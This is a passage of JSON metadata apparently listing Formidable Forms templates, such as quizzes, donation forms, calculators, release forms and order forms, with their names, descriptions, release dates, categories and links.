13:18:12\",\"categories\":[\"Education\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/lecture-notes-form\\/\",\"icon\":false,\"key\":\"lecture-notes\",\"is_new\":false},\"28109851\":{\"name\":\"Quiz\",\"slug\":\"quiz-form\",\"description\":\"This multiple-choice quiz template is a great example of basic quiz scoring.\",\"id\":28109851,\"released\":\"2022-02-28 12:00:04\",\"categories\":[\"Business\",\"Education\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/quiz-form\\/\",\"icon\":false,\"key\":\"quiz\",\"is_new\":false},\"28148784\":{\"name\":\"Harry Potter House Quiz Template\",\"slug\":\"harry-potter-house-quiz-form\",\"description\":\"Get to know which Hogwarts house you truly belong in with this quiz form template.\",\"id\":28148784,\"released\":\"2022-09-20 10:47:37\",\"categories\":[\"Business\",\"Conversational Forms\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/harry-potter-house-quiz-form\\/\",\"icon\":false,\"key\":\"harry-potter-house-quiz\",\"is_new\":false},\"28036175\":{\"name\":\"Support Ticket Form Template\",\"slug\":\"support-ticket-form\",\"description\":\"Looking for a support ticket form template? This form helps you manage customer support requests with ease! Users submit requests & create tickets all at once.\",\"id\":28036175,\"released\":\"2020-12-18 12:56:44\",\"categories\":[\"Customer Service\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/support-ticket-form\\/\",\"icon\":false,\"key\":\"support-ticket\",\"is_new\":false},\"28019202\":{\"name\":\"Sponsorship Form Template\",\"slug\":\"sponsorship-form\",\"description\":\"A simple form for use in managing business sponsorships.\",\"id\":28019202,\"released\":\"2020-10-01 08:18:17\",\"categories\":[\"Basic\",\"Business Operations\",\"Nonprofit\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/sponsorship-form\\/\",\"icon\":false,\"key\":\"sponsorship\",\"is_new\":false},\"28032452\":{\"name\":\"Webinar Registration Form Template\",\"slug\":\"webinar-registration-form\",\"description\":\"A webinar registration form that can be connected to Zoom via Zapier.\",\"id\":28032452,\"released\":\"2020-12-01 13:20:46\",\"categories\":[\"Business\",\"Business Operations\",\"Personal\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/webinar-registration-form\\/\",\"icon\":false,\"key\":\"webinar-registration\",\"is_new\":false},\"28030947\":{\"name\":\"Deadline Calculator Template\",\"slug\":\"deadline-calculator-form\",\"description\":\"Calculate deadlines in seconds. Add or subtract days from a date to calculate a new date.\",\"id\":28030947,\"released\":\"2020-11-23 00:00:29\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/deadline-calculator-form\\/\",\"icon\":false,\"key\":\"deadline-calculator\",\"is_new\":false},\"28018812\":{\"name\":\"Photo Release Form Template\",\"slug\":\"photo-release-form\",\"description\":\"An easy to use template for releasing photos.\",\"id\":28018812,\"released\":\"2020-09-21 09:58:01\",\"categories\":[\"Business\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/photo-release-form\\/\",\"icon\":false,\"key\":\"photo-release\",\"is_new\":false},\"28018839\":{\"name\":\"Medical Release Form Template\",\"slug\":\"medical-release-form\",\"description\":\"A simple medical release platform that also allows you to collect basic information as well.\",\"id\":28018839,\"released\":\"2020-09-17 10:47:21\",\"categories\":[\"Business\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/medical-release-form\\/\",\"icon\":false,\"key\":\"medical-release\",\"is_new\":false},\"20908976\":{\"name\":\"IT Asset Form Template\",\"slug\":\"it-asset-form\",\"description\":\"Use this form for hardware inventory and asset management to keep track of valuable equipment.\",\"id\":20908976,\"released\":\"2020-01-06 09:33:18\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/it-asset-form\\/\",\"icon\":false,\"key\":\"it-asset\",\"is_new\":false},\"28019198\":{\"name\":\"Release Form Template\",\"slug\":\"release-form\",\"description\":\"A simple standard release form template.\",\"id\":28019198,\"released\":\"2020-09-14 10:42:09\",\"categories\":[\"Business\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/release-form\\/\",\"icon\":false,\"key\":\"release\",\"is_new\":false},\"28019199\":{\"name\":\"Time Off Request Form Template\",\"slug\":\"time-off-request-form\",\"description\":\"A form for tracking time off of employees.\",\"id\":28019199,\"released\":\"2020-09-24 08:04:22\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/time-off-request-form\\/\",\"icon\":false,\"key\":\"time-off-request\",\"is_new\":false},\"28147968\":{\"name\":\"Product Recommendation Quiz Template\",\"slug\":\"product-recommendation-quiz-form\",\"description\":\"Discover your skin type and the ideal recommended product with this quiz template.\",\"id\":28147968,\"released\":\"2022-09-20 12:05:48\",\"categories\":[\"Business\",\"Conversational Forms\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/product-recommendation-quiz-form\\/\",\"icon\":false,\"key\":\"product-recommendation-quiz\",\"is_new\":false},\"28028161\":{\"name\":\"Direct Deposit ACH Authorization Form Template\",\"slug\":\"direct-deposit-ach-authorization-form\",\"description\":\"Simplify employee onboarding with a direct deposit ACH authorization form.\",\"id\":28028161,\"released\":\"2020-11-23 00:02:48\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/direct-deposit-ach-authorization-form\\/\",\"icon\":false,\"key\":\"direct-deposit-ach-authorization\",\"is_new\":false},\"28173825\":{\"name\":\"Signup Sheet Form Template\",\"slug\":\"signup-sheet-form\",\"description\":\"Generate signups and easily collect information with the signup form template.\",\"id\":28173825,\"released\":\"2023-01-26 16:03:51\",\"categories\":[\"Business\",\"Conversational Forms\",\"Education\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/signup-sheet-form\\/\",\"icon\":false,\"key\":\"signup-sheet\",\"is_new\":false},\"28054276\":{\"name\":\"Pay Raise Percent Calculator Template\",\"slug\":\"pay-raise-percent-calculator-form\",\"description\":\"Enter a wage before and after a raise to find out how big it is.\",\"id\":28054276,\"released\":\"2021-04-14 11:59:56\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/pay-raise-percent-calculator-form\\/\",\"icon\":false,\"key\":\"pay-raise-percent-calculator\",\"is_new\":false},\"28028164\":{\"name\":\"Referral Form Template\",\"slug\":\"referral-form\",\"description\":\"Get referrals from people easily with this short and effective referral form\",\"id\":28028164,\"released\":\"2020-11-23 00:02:17\",\"categories\":[\"Basic\",\"Customer Service\",\"Feedback\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/referral-form\\/\",\"icon\":false,\"key\":\"referral\",\"is_new\":false},\"28030724\":{\"name\":\"Car Donation Form Template\",\"slug\":\"car-donation-form\",\"description\":\"Collecting vehicle donations? Get all the details you need in this simple online form.\",\"id\":28030724,\"released\":\"2020-12-01 00:01:50\",\"categories\":[\"Nonprofit\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/car-donation-form\\/\",\"icon\":false,\"key\":\"car-donation\",\"is_new\":false},\"28030725\":{\"name\":\"Credit Card Donation Form Template\",\"slug\":\"credit-card-donation-form\",\"description\":\"Credit card donations are the easiest way to donate, and this form template will make it quick for your organization.\",\"id\":28030725,\"released\":\"2020-12-01 00:01:42\",\"categories\":[\"Business\",\"Nonprofit\",\"Payment\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/credit-card-donation-form\\/\",\"icon\":false,\"key\":\"credit-card-donation\",\"is_new\":false},\"28028170\":{\"name\":\"Counseling Informed Consent Template\",\"slug\":\"professional-counseling-informed-consent-form\",\"description\":\"Acquire informed consent from clients for mental health treatment.\",\"id\":28028170,\"released\":\"2020-11-23 00:01:26\",\"categories\":[\"Business\",\"Health and Wellness\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/professional-counseling-informed-consent-form\\/\",\"icon\":false,\"key\":\"professional-counseling-informed-consent\",\"is_new\":false},\"28028174\":{\"name\":\"Basketball League Registration Form Template\",\"slug\":\"basketball-league-registration-form\",\"description\":\"Need a basketball registration form template? Take your basketball team to the next level with a form that includes registration fees, contact details, and more for easy online registrations.\",\"id\":28028174,\"released\":\"2020-11-23 00:05:47\",\"categories\":[\"Business\",\"Registration and Signup\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/basketball-league-registration-form\\/\",\"icon\":false,\"key\":\"basketball-league-registration\",\"is_new\":false},\"28056081\":{\"name\":\"Pizza Takeout Order Form Template\",\"slug\":\"pizza-takeout-order-form\",\"description\":\"This quick and easy form is the best way to submit your pizza takeout order.\",\"id\":28056081,\"released\":\"2021-07-05 16:37:27\",\"categories\":[\"Business\",\"Business Operations\",\"Order Form\",\"Payment\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/pizza-takeout-order-form\\/\",\"icon\":false,\"key\":\"pizza-takeout-order\",\"is_new\":false},\"28205842\":{\"name\":\"Science Quiz Template\",\"slug\":\"science-quiz-form\",\"description\":\"Take our science quiz to discover how much you know about certain topics.\",\"id\":28205842,\"released\":\"2023-06-27 16:17:31\",\"categories\":[\"Business\",\"Education\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/science-quiz-form\\/\",\"icon\":false,\"key\":\"science-quiz\",\"is_new\":false},\"28028178\":{\"name\":\"Incident Report Form Template\",\"slug\":\"incident-report-form\",\"description\":\"Use this template to report various types of workplace incidents\",\"id\":28028178,\"released\":\"2020-11-23 00:01:03\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/incident-report-form\\/\",\"icon\":false,\"key\":\"incident-report\",\"is_new\":false},\"28030996\":{\"name\":\"GiveWP Donation Form Template\",\"slug\":\"givewp-donation-form\",\"description\":\"Using GiveWP? This form will help you create a peer-to-peer campaign submission form for GiveWP.\",\"id\":28030996,\"released\":\"2020-12-01 00:01:39\",\"categories\":[\"Nonprofit\",\"Personal\",\"Post\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/givewp-donation-form\\/\",\"icon\":false,\"key\":\"givewp-donation\",\"is_new\":false},\"28056088\":{\"name\":\"Brand Awareness Survey Template\",\"slug\":\"brand-awareness-survey-form\",\"description\":\"Treat your brand like a celebrity. Stay famous by tracking what people like the most.\",\"id\":28056088,\"released\":\"2021-07-08 09:10:20\",\"categories\":[\"Business\",\"Feedback\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/brand-awareness-survey-form\\/\",\"icon\":false,\"key\":\"brand-awareness-survey\",\"is_new\":false},\"28200476\":{\"name\":\"Interactive Fiction Form Template\",\"slug\":\"interactive-fiction-form\",\"description\":\"Use our Interactive Fiction Form to go on an exciting adventure based on your choices.\",\"id\":28200476,\"released\":\"2023-06-27 16:38:04\",\"categories\":[\"Business\",\"Conversational Forms\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/interactive-fiction-form\\/\",\"icon\":false,\"key\":\"interactive-fiction\",\"is_new\":false},\"28150044\":{\"name\":\"Employee Write Up Form Template\",\"slug\":\"write-up-form\",\"description\":\"Report an incident and collect information that you need to implement disciplinary action with the Employee Write Up form template.\",\"id\":28150044,\"released\":\"2022-11-06 16:37:00\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/write-up-form\\/\",\"icon\":false,\"key\":\"write-up\",\"is_new\":false},\"28067101\":{\"name\":\"Fuel Cost Calculator Template\",\"slug\":\"fuel-cost-calculator-form\",\"description\":\"When going on a trip it is nice to know how much fuel will cost. This calculator is very helpful in budgeting for a road trip.\",\"id\":28067101,\"released\":\"2021-07-23 15:30:00\",\"categories\":[\"Business\",\"Calculator\",\"Event Planning\",\"Finance\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/fuel-cost-calculator-form\\/\",\"icon\":false,\"key\":\"fuel-cost-calculator\",\"is_new\":false},\"28067104\":{\"name\":\"Gas Buddy Trip Calculator Form Template\",\"slug\":\"gas-buddy-trip-calculator-form\",\"description\":\"When going on a trip with a buddy, it is nice to know how high the cost will be when splitting it between multiple people.\",\"id\":28067104,\"released\":\"2021-07-23 15:23:25\",\"categories\":[\"Business\",\"Calculator\",\"Event Planning\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/gas-buddy-trip-calculator-form\\/\",\"icon\":false,\"key\":\"gas-buddy-trip-calculator\",\"is_new\":false},\"28205856\":{\"name\":\"Math Quiz Template\",\"slug\":\"math-quiz-form\",\"description\":\"Take our quick and easy math quiz to determine how much you know when it comes to basic math.\",\"id\":28205856,\"released\":\"2023-06-27 16:46:31\",\"categories\":[\"Business\",\"Education\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/math-quiz-form\\/\",\"icon\":false,\"key\":\"math-quiz\",\"is_new\":false},\"28194594\":{\"name\":\"Lesson Idea Generator Form Template\",\"slug\":\"lesson-idea-generator-form\",\"description\":\"Generate engaging lesson plans with the Lesson Idea Generator template by inputting the subject, lesson topic, sub-topic, and any notes about the audience.\",\"id\":28194594,\"released\":\"2023-04-29 23:12:07\",\"categories\":[\"AI\",\"Business\",\"Education\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/lesson-idea-generator-form\\/\",\"icon\":false,\"key\":\"lesson-idea-generator\",\"is_new\":false},\"28028195\":{\"name\":\"Change of Address Form Template\",\"slug\":\"change-of-address-form\",\"description\":\"Need a change of address form template? This form allows any business or government organization to offer an easy way for users to change addresses online.\",\"id\":28028195,\"released\":\"2020-11-23 00:06:21\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/change-of-address-form\\/\",\"icon\":false,\"key\":\"change-of-address\",\"is_new\":false},\"28028196\":{\"name\":\"Audition Form Template\",\"slug\":\"audition-form\",\"description\":\"Looking for an audition form template to streamline auditions to your project? Make auditioning easier for everyone involved by creating an online form based on this template. No coding required!\",\"id\":28028196,\"released\":\"2020-11-23 00:09:59\",\"categories\":[\"Basic\",\"Business Operations\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/audition-form\\/\",\"icon\":false,\"key\":\"audition\",\"is_new\":false},\"28195109\":{\"name\":\"Leave of absence form\",\"slug\":\"leave-of-absence-form\",\"description\":\"This leave of absence request form is used to formally request time off from work for a specific period of time. It includes information such as the reason for the request, the dates of the requested leave, and contact details for while the employee is out..\",\"id\":28195109,\"released\":\"2023-05-02 18:05:28\",\"categories\":[\"Business\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/leave-of-absence-form\\/\",\"icon\":false,\"key\":\"leave-of-absence\",\"is_new\":false},\"28028199\":{\"name\":\"Vacation Request Form Template\",\"slug\":\"vacation-request-form\",\"description\":\"Let employees request time off online with this vacation request form template.\",\"id\":28028199,\"released\":\"2020-11-23 00:03:20\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/vacation-request-form\\/\",\"icon\":false,\"key\":\"vacation-request\",\"is_new\":false},\"28200744\":{\"name\":\"History Quiz Template\",\"slug\":\"history-quiz-form\",\"description\":\"Test your knowledge of world history through our history quiz.\",\"id\":28200744,\"released\":\"2023-06-27 16:30:50\",\"categories\":[\"Business\",\"Education\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/history-quiz-form\\/\",\"icon\":false,\"key\":\"history-quiz\",\"is_new\":false},\"28028203\":{\"name\":\"Video Release Form Template\",\"slug\":\"video-release-form\",\"description\":\"Get consent to share videos in your business marketing.\",\"id\":28028203,\"released\":\"2020-11-23 00:01:26\",\"categories\":[\"Business\",\"Business Operations\",\"Marketing\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/video-release-form\\/\",\"icon\":false,\"key\":\"video-release\",\"is_new\":false},\"28200493\":{\"name\":\"Harry Potter Character Quiz Form Template\",\"slug\":\"harry-potter-character-quiz-form\",\"description\":\"Take this quick and easy quiz to find out which Harry Potter character you are.\",\"id\":28200493,\"released\":\"2023-05-31 13:38:51\",\"categories\":[\"Business\",\"Conversational Forms\",\"Personal\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/harry-potter-character-quiz-form\\/\",\"icon\":false,\"key\":\"harry-potter-character-quiz\",\"is_new\":false},\"28054574\":{\"name\":\"Conversion Rate Calculator\",\"slug\":\"conversion-rate-calculator-form\",\"description\":\"Find out the percentage of people are making purchases with this quick and easy lead magnet conversion rate calculator.\",\"id\":28054574,\"released\":\"2021-07-12 08:16:52\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/conversion-rate-calculator-form\\/\",\"icon\":false,\"key\":\"conversion-rate-calculator\",\"is_new\":false},\"28054576\":{\"name\":\"Credit Card Repayment Calculator\",\"slug\":\"credit-card-repayment-calculator-form\",\"description\":\"Let visitors know how long it would take to get out of debt. This quick and easy credit card repayment calculator is a great way to generate leads.\",\"id\":28054576,\"released\":\"2021-08-06 16:15:23\",\"categories\":[\"Business\",\"Calculator\",\"Finance\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/credit-card-repayment-calculator-form\\/\",\"icon\":false,\"key\":\"credit-card-repayment-calculator\",\"is_new\":false},\"28097584\":{\"name\":\"Request a Callback\",\"slug\":\"request-a-callback-form\",\"description\":\"There are many different ways to get in touch with customers, but sometimes the most effective is a call back.\",\"id\":28097584,\"released\":\"2021-12-20 11:25:07\",\"categories\":[\"Basic\",\"Customer Service\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/request-a-callback-form\\/\",\"icon\":false,\"key\":\"request-a-callback\",\"is_new\":false},\"28200754\":{\"name\":\"Career Quiz Template\",\"slug\":\"career-quiz-form\",\"description\":\"Take this short quiz and discover your ideal career based on your responses.\",\"id\":28200754,\"released\":\"2023-06-27 16:22:04\",\"categories\":[\"Business\",\"Conversational Forms\",\"Personal\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/career-quiz-form\\/\",\"icon\":false,\"key\":\"career-quiz\",\"is_new\":false},\"28145458\":{\"name\":\"Medical History Form Template\",\"slug\":\"medical-history-form\",\"description\":\"Make new patient registration faster by collecting information about a patient\\u2019s past conditions with the medical history form.\",\"id\":28145458,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Basic\",\"Health and Wellness\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/medical-history-form\\/\",\"icon\":false,\"key\":\"medical-history\",\"is_new\":false},\"28031026\":{\"name\":\"Rental Application Form Template\",\"slug\":\"rental-application-form\",\"description\":\"A comprehensive rental application form that takes all the relevant details from the applicant, including contact details, rental history, references, employment details, and next of kin.\",\"id\":28031026,\"released\":\"2020-11-25 13:30:08\",\"categories\":[\"Application\",\"Business\",\"Real Estate\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/rental-application-form\\/\",\"icon\":false,\"key\":\"rental-application\",\"is_new\":false},\"28145463\":{\"name\":\"Doctor Visit Form Template\",\"slug\":\"doctor-visit-form\",\"description\":\"Manage patient appointments and keep track of their follow ups with this doctor visit form template.\",\"id\":28145463,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Health and Wellness\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/doctor-visit-form\\/\",\"icon\":false,\"key\":\"doctor-visit\",\"is_new\":false},\"28031031\":{\"name\":\"Project Request Form Template\",\"slug\":\"project-request-form\",\"description\":\"This project request form template is designed to be the first point of contact between a potential customer and a creative service provider.\",\"id\":28031031,\"released\":\"2020-11-26 07:00:09\",\"categories\":[\"Customer Service\",\"Marketing\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/project-request-form\\/\",\"icon\":false,\"key\":\"project-request\",\"is_new\":false},\"28196153\":{\"name\":\"Catering Order Form Template\",\"slug\":\"catering-order-form\",\"description\":\"Use this quick and easy catering order form to effectively organize catering services for an event.\",\"id\":28196153,\"released\":\"2023-05-30 17:58:25\",\"categories\":[\"Business\",\"Event Planning\",\"Order Form\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/catering-order-form\\/\",\"icon\":false,\"key\":\"catering-order\",\"is_new\":false},\"28200505\":{\"name\":\"Spirit Animal Quiz Template\",\"slug\":\"spirit-animal-quiz-form\",\"description\":\"Discover your spirit animal through a quick and intriguing quiz.\",\"id\":28200505,\"released\":\"2023-06-27 16:34:58\",\"categories\":[\"Business\",\"Conversational Forms\",\"Personal\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/spirit-animal-quiz-form\\/\",\"icon\":false,\"key\":\"spirit-animal-quiz\",\"is_new\":false},\"28056636\":{\"name\":\"Neighborhood Feedback Form Template\",\"slug\":\"neighborhood-feedback-form\",\"description\":\"Get input in order to better understand how the community feels about a neighborhood! All responses are compiled into an easy-to-read report.\",\"id\":28056636,\"released\":\"2021-07-28 15:49:09\",\"categories\":[\"Event Planning\",\"Feedback\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/neighborhood-feedback-form\\/\",\"icon\":false,\"key\":\"neighborhood-feedback\",\"is_new\":false},\"28200514\":{\"name\":\"Vocabulary Quiz Form Template\",\"slug\":\"vocabulary-quiz-form\",\"description\":\"Take this vocabulary quiz to expand your vocabulary and discover how much you know.\",\"id\":28200514,\"released\":\"2023-06-27 16:51:37\",\"categories\":[\"Business\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/vocabulary-quiz-form\\/\",\"icon\":false,\"key\":\"vocabulary-quiz\",\"is_new\":false},\"28028231\":{\"name\":\"Fundraiser Order Form Template\",\"slug\":\"fundraiser-order-form\",\"description\":\"Make online fundraising a breeze and help volunteers raise money for your nonprofit.\",\"id\":28028231,\"released\":\"2020-12-01 00:01:23\",\"categories\":[\"Business\",\"Calculator\",\"Nonprofit\",\"Order Form\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/fundraiser-order-form\\/\",\"icon\":false,\"key\":\"fundraiser-order\",\"is_new\":false},\"28057162\":{\"name\":\"Employee Termination Form Template\",\"slug\":\"employee-termination-form\",\"description\":\"This form is a quick and easy way to log employee terminations.\",\"id\":28057162,\"released\":\"2021-07-26 15:41:53\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-termination-form\\/\",\"icon\":false,\"key\":\"employee-termination\",\"is_new\":false},\"28031306\":{\"name\":\"Bakery Order Form Template\",\"slug\":\"bakery-order-form\",\"description\":\"Boost sales and eliminate paperwork with this simple bakery order form.\",\"id\":28031306,\"released\":\"2020-11-27 00:01:08\",\"categories\":[\"Business Operations\",\"Calculator\",\"Elite\",\"Order Form\",\"Payment\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/bakery-order-form\\/\",\"icon\":false,\"key\":\"bakery-order\",\"is_new\":false},\"28121163\":{\"name\":\"Google Autofill Address Form Template\",\"slug\":\"google-address-autofill-form\",\"description\":\"Fill out forms faster and get more accurate data by integrating a Google Map into your web forms to autofill addresses.\",\"id\":28121163,\"released\":\"2022-08-09 16:39:34\",\"categories\":[\"Business\",\"Geolocation\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/google-address-autofill-form\\/\",\"icon\":false,\"key\":\"google-address-autofill\",\"is_new\":false},\"28147531\":{\"name\":\"Agreement Form Template\",\"slug\":\"agreement-form\",\"description\":\"Create a legal agreement between two parties with the agreement form template.\",\"id\":28147531,\"released\":\"2022-11-06 13:14:00\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/agreement-form\\/\",\"icon\":false,\"key\":\"agreement\",\"is_new\":false},\"28057167\":{\"name\":\"Online Race Registration Form Template\",\"slug\":\"online-race-registration-form\",\"description\":\"Save time with this simple and easy online race registration form.\",\"id\":28057167,\"released\":\"2021-08-14 16:27:54\",\"categories\":[\"Basic\",\"Event Planning\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/online-race-registration-form\\/\",\"icon\":false,\"key\":\"online-race-registration\",\"is_new\":false},\"28031313\":{\"name\":\"Church Donation Form Template\",\"slug\":\"church-donation-form\",\"description\":\"Collect donations for your church or a cause with Stripe credit card payments.\",\"id\":28031313,\"released\":\"2020-12-01 00:01:57\",\"categories\":[\"Business\",\"Nonprofit\",\"Payment\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/church-donation-form\\/\",\"icon\":false,\"key\":\"church-donation\",\"is_new\":false},\"28057939\":{\"name\":\"Avon Order Form Template\",\"slug\":\"avon-order-form\",\"description\":\"This Avon order form is great if you are looking to sell makeup online!\",\"id\":28057939,\"released\":\"2021-08-17 16:34:06\",\"categories\":[\"Business\",\"Business Operations\",\"Order Form\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/avon-order-form\\/\",\"icon\":false,\"key\":\"avon-order\",\"is_new\":false},\"28145235\":{\"name\":\"Check Request Form Template\",\"slug\":\"check-request-form\",\"description\":\"Level up business operations with the check request form! Request a check to pay bills or make purchases from your business accounts.\",\"id\":28145235,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\",\"Order Form\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/check-request-form\\/\",\"icon\":false,\"key\":\"check-request\",\"is_new\":false},\"28029525\":{\"name\":\"Employment Verification Form Template\",\"slug\":\"employment-verification-form\",\"description\":\"An employment verification form allows individuals to easily apply for housing or mortgage applications by confirming their income or salary.\",\"id\":28029525,\"released\":\"2020-11-23 00:01:07\",\"categories\":[\"Application\",\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employment-verification-form\\/\",\"icon\":false,\"key\":\"employment-verification\",\"is_new\":false},\"28031318\":{\"name\":\"Donation Request Form Template\",\"slug\":\"donation-request-form\",\"description\":\"Request donations for your event with this form.\",\"id\":28031318,\"released\":\"2020-12-01 00:01:44\",\"categories\":[\"Event Planning\",\"Nonprofit\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/donation-request-form\\/\",\"icon\":false,\"key\":\"donation-request\",\"is_new\":false},\"28108886\":{\"name\":\"Suggestion Box Form Template\",\"slug\":\"suggestion-box-form\",\"description\":\"A form template that allows an online suggestion box for customers.\",\"id\":28108886,\"released\":\"2022-03-01 14:01:16\",\"categories\":[\"Business\",\"Customer Service\",\"Feedback\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/suggestion-box-form\\/\",\"icon\":false,\"key\":\"suggestion-box\",\"is_new\":false},\"28029527\":{\"name\":\"Release of Liability Form Template\",\"slug\":\"release-of-liability-form\",\"description\":\"Protect the individual, group, or organization from being held legally responsible in the event of an incident.\",\"id\":28029527,\"released\":\"2020-11-23 00:01:46\",\"categories\":[\"Business Operations\",\"Personal\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/release-of-liability-form\\/\",\"icon\":false,\"key\":\"release-of-liability\",\"is_new\":false},\"28145240\":{\"name\":\"Request Form Template\",\"slug\":\"request-form\",\"description\":\"Get more information from your customers and manage your requests with ease with the request form template!\",\"id\":28145240,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Basic\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/request-form\\/\",\"icon\":false,\"key\":\"request\",\"is_new\":false},\"28145242\":{\"name\":\"Evaluation Form Template\",\"slug\":\"evaluation-form\",\"description\":\"Obtain valuable feedback on the quality of the presentation and identify areas that need improvement.\",\"id\":28145242,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Business Operations\",\"Feedback\",\"Signature\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/evaluation-form\\/\",\"icon\":false,\"key\":\"evaluation\",\"is_new\":false},\"28029530\":{\"name\":\"Training Acknowledgement Form Template\",\"slug\":\"training-acknowledgement-form\",\"description\":\"Get proof that an individual has attended and completed a training program.\",\"id\":28029530,\"released\":\"2020-11-23 00:01:23\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/training-acknowledgement-form\\/\",\"icon\":false,\"key\":\"training-acknowledgement\",\"is_new\":false},\"28031322\":{\"name\":\"Raffle Donation Form Template\",\"slug\":\"raffle-donation-form\",\"description\":\"Collect and track donated items for a raffle or auction in this easy online form.\",\"id\":28031322,\"released\":\"2020-12-01 00:01:48\",\"categories\":[\"Nonprofit\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/raffle-donation-form\\/\",\"icon\":false,\"key\":\"raffle-donation\",\"is_new\":false},\"28031324\":{\"name\":\"Sponsor Donation Form Template\",\"slug\":\"sponsor-donation-form\",\"description\":\"Use this online form to handle your event sponsorship and donation 